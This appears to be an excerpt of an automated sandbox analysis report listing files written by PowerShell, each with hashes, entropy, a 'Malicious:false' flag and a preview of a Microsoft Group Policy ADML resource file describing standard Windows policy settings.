                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2386
                                                                                                                                                                                                        Entropy (8bit):4.892231615075483
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cs+D5p8lF9YGTBdVhcNZPhcNspL8K5pWNLcrdYAkWQ/tgiwavEARV:P+D5iF9YGTnVhcNhhcNspL8KiNFBWQ/P
                                                                                                                                                                                                        MD5:C16E4D55B366521038B07E5B2EAA4D1A
                                                                                                                                                                                                        SHA1:C8FA7021E315736D6ED23ACA59D8B0CC3460FDD2
                                                                                                                                                                                                        SHA-256:0FB29A9479B51033FDE4838E9E61D1D382B173EF4F43C00799EF97940F0E498C
                                                                                                                                                                                                        SHA-512:9DC2BFAAE5885EE74E4AB8C7E9D0B6557550F8E6315199F23006F202AA234244CA1802D2D289F95E3213CA577DBD14D7D086CED34BDE2349C127CB31141E2512
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Servicing Policies</displayName>.. <description>Windows Servicing Policies</description>.. <resources>.. <stringTable>.. <string id="CloudFulfillmentGPO">Specify settings for optional component installation and component repair</string>.. <string id="CloudFulfillmentGPOExplanation">..This policy setting specifies the network locations that will be used for the repair of operating system corruption and for enabling optional features that have had their payload files removed.....If you enable this policy setting and specify the new location, the files in that location will be used to repair operating system corruption and for enabling
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9740
                                                                                                                                                                                                        Entropy (8bit):4.723278539465857
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:PD5pmpC5ZTUe/5edwuTysvjk9yGfUqWxOV:ftHUwueIjkkGfnWw
                                                                                                                                                                                                        MD5:A46525DCC0BBEFF3717004AA7D5E686B
                                                                                                                                                                                                        SHA1:85429467F34FFB172D7E404E60542C50090C6AFE
                                                                                                                                                                                                        SHA-256:044A3C384EC4E46E9EE6AA4BF4D28F3027A758DE7A9163324FE80EE466E935E5
                                                                                                                                                                                                        SHA-512:551C90AD33D7ECBE6E0D45B1FF22ED092C239EFC63189D7D0E0FF1147E82C3694ECE958DF4DF5A89F87E4CE966284D9317CEE93D6F38B76152ED26A3D2DC54A0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. General -->.. <string id="SettingSyncCategory">Sync your settings</string>.... Main policy -->.. <string id="DisableSettingSync">Do not sync</string>.. <string id="DisableSettingSync_Help">Prevent syncing to and from this PC. This turns off and disables the "sync your settings" switch on the "sync your settings" page in PC Settings.....If you enable this policy setting, "sync your settings" will be turned off, and none of the "sync your setting" groups will be synced on this PC.....Use the option
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2060
                                                                                                                                                                                                        Entropy (8bit):4.847450101986129
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ybvkTvKvkTlE6OmYyfbTebTlCa/Yi7R0ryMOVjoV:cgeD5x8gm8fKnxRRxYEbQRj/Yi7S0oV
                                                                                                                                                                                                        MD5:9940A876376DFACA4C22AEB49D5E98D1
                                                                                                                                                                                                        SHA1:4092EC36B7F64EB2D076D11F04AFBB38C95A9AEB
                                                                                                                                                                                                        SHA-256:F0AF5022E574F037FEFF288B1944788E08E9F1C3CC29E2968022B05EE8A12D71
                                                                                                                                                                                                        SHA-512:DE5BF65874ABDF5AF96EA22C5D97170AE5B3312B39A2FB3C19F1E33D0A7AC71F2633510E2CE1C87794FE818CD50DA4FB2D328E69C1E0005D9C8D86B96A88C1D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ServicePackSourcePath">Specify Windows Service Pack installation file location</string>.. <string id="ServicePackSourcePath_Help">Specifies an alternate location for Windows Service Pack installation files.....If you enable this policy setting, enter the fully qualified path to the new location in the "Windows Service Pack Setup file path" box.....If you disable or do not configure this policy setting, the Windows Service Pack Setup source path will be the location used during the last time Windows Service Pac
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1850
                                                                                                                                                                                                        Entropy (8bit):4.859149246040625
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKgJxujBDrfS1Z/yqqqYu5BV5ocfS1Z/MFV:LeD5pmCeKV4JcKVMFV
                                                                                                                                                                                                        MD5:B512AC9CA34BC2605D206FA9D22778F1
                                                                                                                                                                                                        SHA1:21E31C62BA3B2E963A2A78B9490270D87E14F082
                                                                                                                                                                                                        SHA-256:3649D182A6D570C693D564E11B80127960E3F34BD98C2DABC5E5A1F640B7EACF
                                                                                                                                                                                                        SHA-512:2F726D9A4E067AC354A7C6E5EC36EC5973CD04731E4A14DF3DE30061447A077F38F8B4752112E0DB0BA3E1DACCB6A0C98F148F4FB00FCBEE07B6D6A7206020F0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PublishDfsRoots">Allow DFS roots to be published</string>.. <string id="PublishDfsRoots_Help">This policy setting determines whether the user can publish DFS roots in Active Directory Domain Services (AD DS).....If you enable or do not configure this policy setting, users can use the "Publish in Active Directory" option to publish DFS roots as shared folders in AD DS .....If you disable this policy setting, users cannot publish DFS roots in AD DS and the "Publish in Active Directory" option is disabled. Note:
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (372), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2463
                                                                                                                                                                                                        Entropy (8bit):4.766622027240466
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKMQ44nWQqxjgwrGOnLbvE4juaM8oFV:LeD5pmdpMGOnN6aM8oFV
                                                                                                                                                                                                        MD5:F76CBCDF77EAC5FEF366F9F9D45F5E76
                                                                                                                                                                                                        SHA1:89F54964A2B4E1DE63448AADFCC678470886DDAF
                                                                                                                                                                                                        SHA-256:56D6E0E7FD98836C698D345735B4F7633DF49C455500C41B20E7B5D6FDF40AB3
                                                                                                                                                                                                        SHA-512:D86BB5E1DA555D6F09FEA4E3C930AE560E777F64B0C38A225201CC401869A82A0A05A5C3E874310C1F4C0BA33F131B607CBA7DAB8BE61AC247F44CCB080401D2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoInplaceSharing">Prevent users from sharing files within their profile.</string>.. <string id="NoInplaceSharing_Help">This policy setting specifies whether users can share files within their profile. By default users are allowed to share files within their profile to other users on their network after an administrator opts in the computer. An administrator can opt in the computer by using the sharing wizard to share a file within their profile.....If you enable this policy setting, users cannot share files w
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5239
                                                                                                                                                                                                        Entropy (8bit):4.777406183575808
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmrH1U680U30fNS57tc/Ja80+fgT9lsc/osa80+fVxV:EYU6xU3RtckQ0zscCQVT
                                                                                                                                                                                                        MD5:3925D35054AB425A8F3690C2FA33BDFC
                                                                                                                                                                                                        SHA1:A2DFC384B4F8351B40B9406A94ADEFB1B85F9C7B
                                                                                                                                                                                                        SHA-256:BEC7CF7EC0CDFD01BB8677C20C887988A642742F136C0437D49A67F218087842
                                                                                                                                                                                                        SHA-512:AE7CABBE1C4E7618E787F9D3BDB621CB32E99F5802114A20BCF6ADA2E7B52F7EE12556E8023B38142FF42EA580624DAB40D988B23AEE4BB4BB9E2A8905B175D1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableCMD">Prevent access to the command prompt</string>.. <string id="DisableCMD_Help">This policy setting prevents users from running the interactive command prompt, Cmd.exe. This policy setting also determines whether batch files (.cmd and .bat) can run on the computer.....If you enable this policy setting and the user tries to open a command window, the system displays a message explaining that a setting prevents the action.....If you disable this policy setting or do not configure it, users can run Cmd.
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1034
                                                                                                                                                                                                        Entropy (8bit):4.934703334666594
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8Cnid3PRM5LDa3IQWFV:cgeD5x8gm8fK4IPRMNe3IQWFV
                                                                                                                                                                                                        MD5:E1C3A48A813C8E8D7F076966FFF1782F
                                                                                                                                                                                                        SHA1:E678B2457A0B3D7FA37C25899823E1DCBF335552
                                                                                                                                                                                                        SHA-256:778A48685463098ECBAB0E95EC4BA4CC299704453A10B790404D636C78495A6F
                                                                                                                                                                                                        SHA-512:E7B2002E5ABEDBC1C2E877143F6296A060FF2BE18CDF9743119F068CBA422A4D4B502E7E69DCABA5D1A5BBB20E42D9EA978479A3A996040E4F9CC5413F1E1F5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RestrictWelcomeCenter">Do not display the Welcome Center at user logon</string>.. <string id="RestrictWelcomeCenter_Help">This policy setting prevents the display of the Welcome Center at user logon.....If you enable this policy setting, the Welcome Center is not displayed at user logon. The user can access the Welcome Center using the Control Panel or Start menu.....If you disable or do not configure this policy setting, the Welcome Center is displayed at user logon.</string>.. </stringTable>.. </resource
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2181
                                                                                                                                                                                                        Entropy (8bit):4.808024425882859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKv7uPPd4IaFpT6P0vQWjp3lFV:LeD5pm38BG56i1FV
                                                                                                                                                                                                        MD5:FF097ECD6B6D14BEEB70B111DEB1EE8C
                                                                                                                                                                                                        SHA1:2AE1D93696A7892254D05D9C73B21360B056EDAE
                                                                                                                                                                                                        SHA-256:70198BCD06B06CBBFBE1CCDDDC0815D3BB2239CAD51403E32340C20B892A06D9
                                                                                                                                                                                                        SHA-512:E1C41A1B9CC3CE9987CFA52447A24CCEA55CE38F4F09AAC5071365CF206D28D94F7C4CE77B3B693D019084DA2BD5F9646EEB287BA8C4CBDADB06C6614EF87F03
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Sidebar">Desktop Gadgets</string>.. <string id="TurnOffSidebar">Turn off desktop gadgets</string>.. <string id="TurnOffSidebar_Explain">This policy setting allows you to turn off desktop gadgets. Gadgets are small applets that display information or utilities on the desktop.....If you enable this setting, desktop gadgets will be turned off.....If you disable or do not configure this setting, desktop gadgets will be turned on.....The default is for desktop gadgets to be turned on.</string>.. <string
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3086
                                                                                                                                                                                                        Entropy (8bit):4.858829936806005
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:c/x8gZmwKweH8weDCmOw7khgLf6aweXLwepnFo7hgjfAwleJ9dwBb7DQweFXKV:wpZmmymCmCeSVAo7hzzM7DXLV
                                                                                                                                                                                                        MD5:7C6ABEF96D8FC4473B348F9CC6AB14CA
                                                                                                                                                                                                        SHA1:4ED99551F1EF8DCD42BC5A66A9072739CBB106A8
                                                                                                                                                                                                        SHA-256:0D9F815210F123D3A3201EA0530F0C5F4C8C2B3CF6AE146402D1B3D7E83E77C6
                                                                                                                                                                                                        SHA-512:A360D6F086C9173869E70027EEB9BA07CE40DEA1098E0582206F7A4D3EF101DDD4DDBCB5A7CB95445CC4394FB09577D6C81DACEC6791F592DE18F80A515C75C8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Prevent OneDrive file sync</displayName>.. <description>Prevent files from being automatically synced to OneDrive</description>.. <resources>.. <stringTable>.. general -->.. <string id="SkydriveSettingCategory">OneDrive</string>.. .. prevent file sync-->.. <string id="PreventSkydriveFileSync">Prevent the usage of OneDrive for file storage</string>.. <string id="PreventSkydriveFileSync_help">This policy setting lets you prevent apps and features from working with files on OneDrive...If you enable this policy setting:....* Users can.t access OneDrive from the OneDrive app and file picker...* Windows Store apps can.t access OneDrive using the WinRT API...* OneDrive
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13897
                                                                                                                                                                                                        Entropy (8bit):4.622403059025047
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ErlLxCEj//4LPwqCop5PqByD2mqKzeYWApNHXsV3sCkm0gb9DiCPoQCDEi1969sp:OHal3as861969sMot
                                                                                                                                                                                                        MD5:8EE4A00ED150375834D94CDF3644BB08
                                                                                                                                                                                                        SHA1:2818877ACB6381F12CB1583B8C366B8E2E8FB8CF
                                                                                                                                                                                                        SHA-256:CF6F61B50CD4BF427834FEC9D7D5C6FBDC0CDB3C5E8E07A66F04BA3D60E093B9
                                                                                                                                                                                                        SHA-512:4E4B668272BF4F64C4C47E09A2F38422D49391C418A62CB1E955A683B7045E0646FDC33E5565902F20281D28406074FFC07FC9A5AB9A4154B6F2D496C3DD1087
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowCertificatesWithNoEKU">Allow certificates with no extended key usage certificate attribute</string>.. <string id="AllowCertificatesWithNoEKU_help">This policy setting lets you allow certificates without an Extended Key Usage (EKU) set to be used for logon.....In versions of Windows prior to Windows Vista, smart card certificates that are used for logon require an enhanced key usage (EKU) extension with a smart card logon object identifier. This policy setting can be used to modify that restriction.....If
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2612
                                                                                                                                                                                                        Entropy (8bit):4.846146849523547
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKmZRbhuTOk1/hK82bGGrTFwbXOxJhK8hTwJkxwXzNCSFV:LeD5pmCZlhuykphr2bGGrTFwb+7hrhT8
                                                                                                                                                                                                        MD5:80C54C63C7D081F9C7D7738D50F1D92A
                                                                                                                                                                                                        SHA1:11ECD72C962D4B9F90E158A8D0D9544A3101D6A0
                                                                                                                                                                                                        SHA-256:D764EA69BA0C9BF3B83D8D497820419A8EC755B4A81C4394DB5A73C6FF19CDFB
                                                                                                                                                                                                        SHA-512:D82E63819C06EBAE7A2E0BD8B9CD879D766EA18A4B2B2CAB3E38A2ECF8D585E40C0F2EF89FD59781B3D6A6152AC65C40A2FEC966BB37151F8DA3CFEA8AD4ED22
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Snis">Server for NIS</string>.. <string id="Snis_LoggingLevel">Turn on extensive logging for Active Directory Domain Services domain controllers that are running Server for NIS</string>.. <string id="Snis_LoggingLevel_Help">This policy setting allows an administrator to configure extensive logging for computers that are running Server for Network Information Service (NIS).....If you enable this policy setting, intermediate steps of NIS map updates or propagations, and whether map updates are successful, a
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5042
                                                                                                                                                                                                        Entropy (8bit):4.799259798850357
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm4bGHevi6cwIJyoKbT6c0Jyovt46cwnJyoPlV:EJHi65MKf6JF4655PH
                                                                                                                                                                                                        MD5:C5F44A83C74633615BB7005A8530B912
                                                                                                                                                                                                        SHA1:63AFE83576A32B083EFA4003A95CD82A66461FDC
                                                                                                                                                                                                        SHA-256:205A6CCFF312FB39D59B754925B871CA51845DEB5224EC0BF41B48BE64589C7D
                                                                                                                                                                                                        SHA-512:A11028E185B061A2F42849F09CBB50AA75D0B6FB25650A65C1099CC33E5CEFD024B870F0E3E5C39C1B632DCDC9B4AB7526D5A29DD5DF1E33BABB45AA31D6F4AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SNMP_Communities">Specify communities</string>.. <string id="SNMP_PermittedManagers">Specify permitted managers</string>.. <string id="SNMP_PermittedManagers_Help">This policy setting determines the permitted list of hosts that can submit a query to the Simple Network Management (SNMP) agent running on the client computer.....Simple Network Management Protocol is a protocol designed to give a user the capability to remotely manage a computer network by polling and setting terminal values and monitoring ne
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                        Entropy (8bit):4.968946981075251
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yef8kxNxVhSexuCvLeKF47q8wFV:cgeD5x8gm8fKR8kNxVPcCzeo4XwFV
                                                                                                                                                                                                        MD5:9C112ED54F6D15614FBA9B6AA1CDFBB0
                                                                                                                                                                                                        SHA1:1F3FFFEA352DC383AA91DFC61290B95218910B59
                                                                                                                                                                                                        SHA-256:F44E48D84C8A5914AAEBC31206F09194DC1041F3DEA70AD7ECD0E402EE3DF165
                                                                                                                                                                                                        SHA-512:E60C57BC46963AC5A09F9C7EA82A23A5E06155D4FF0417EE5A0672B7CB053F62D8765FF807FCE58F2EBF15AB835C942B45089DE2A12B5ED3B5CA7C63D62A8941
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Soundrec_DiableApplication_TitleText">Do not allow Sound Recorder to run</string>.. <string id="Soundrec_DisableApplication_DescriptionText">Specifies whether Sound Recorder can run.....Sound Recorder is a feature of Microsoft Windows Vista that can be used to record sound from an audio input device where the recorded sound is encoded and saved as an audio file.....If you enable this policy setting, Sound Recorder will not run.....If you disable or do not configure this policy setting, Sound Recorder can be ru
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54118
                                                                                                                                                                                                        Entropy (8bit):4.666836415862256
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:kpbzNqeMWd095QOJzSqREFzK1HF/KPCyFqcJjkOme8j:kp/xMWd095QKz9oPCyUh
                                                                                                                                                                                                        MD5:41F89434F7FD242C4772AFB8152909BD
                                                                                                                                                                                                        SHA1:BCC3FC1A4CAE549D934AC9C18C61E4C956E275B7
                                                                                                                                                                                                        SHA-256:030E413AF912FFCBFDB98B2E96A898B6826F7653C1ED021F4CEEDCC7B8C2127E
                                                                                                                                                                                                        SHA-512:27C9BFBF15C3B7BF41A4030094F7B588ED531C2EFB4517E5F9F51A82F55E87BB6C58A9C020C9CF35BFFFD953EE91B39115A4D766C29873ADBE95B448E551EF6E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ClearRecentProgForNewUserInStartMenu">Clear the recent programs list for new users</string>.. <string id="ClearRecentProgForNewUserInStartMenu_Help">If you enable this policy setting, the recent programs list in the start menu will be blank for each new user.....If you disable or do not configure this policy, the start menu recent programs list will be pre-populated with programs for each new user.</string>.. <string id="NoGamesFolderOnStartMenu">Remove Games link from Start Menu</string>.. <string i
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2647
                                                                                                                                                                                                        Entropy (8bit):4.731629807407312
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKJzpQytkh9hyLbSTW3bvkKh+HAskRcHGhwHSbzURJ1amFV:LeD5pm1J+cbeKhjREVbFFV
                                                                                                                                                                                                        MD5:F0306B958EC9DAF0C4E5D2BA8355A02E
                                                                                                                                                                                                        SHA1:970411B4074BB88CDC75E6CA63D83B51FD6220E3
                                                                                                                                                                                                        SHA-256:79B2C3CA033B5CCECB7D24032FFBF7A718EC34BAF4C8BA66E862917337B9FBB5
                                                                                                                                                                                                        SHA-512:32777DE33CE98BE7333D9045D8E1033E629160AD7CC205B6CCA1523F2E6886CBEE20F3682D59D315B949B35481711E8B8A6EA7399BD0137A83496D800BC6882E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SR">System Restore</string>.. <string id="SR_DisableConfig">Turn off Configuration</string>.. <string id="SR_DisableConfig_Help">Allows you to disable System Restore configuration through System Protection.....This policy setting allows you to turn off System Restore configuration through System Protection.....System Restore enables users, in the event of a problem, to restore their computers to a previous state without losing personal data files. The behavior of this policy setting depends on the "Turn o
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (751), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19376
                                                                                                                                                                                                        Entropy (8bit):4.677466344688263
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qPHRyQKHBVDkb+wRZtGixXgixyeMJgKzX1SR7YK9q/:qPHgQyPIbBRZtGYXgYYGKUg
                                                                                                                                                                                                        MD5:62D34160550F61471F77F778AA1280CA
                                                                                                                                                                                                        SHA1:2D681645F48460DBA0875917CBF1D2EA0970A161
                                                                                                                                                                                                        SHA-256:62154D9046066523B2833A380FB4A6841AB369D4E7502D1EF8AD93462E0CCE12
                                                                                                                                                                                                        SHA-512:0ACBF5E61FFB9E1F18496F6713F865E392E92CE613CFC143DAF254F63101CB1B0C0FAF16931B111BF1E47E7206B4676079371BCCD6A25543EA6A18AD676B9590
                                                                                                                                                                                                        Malicious:false
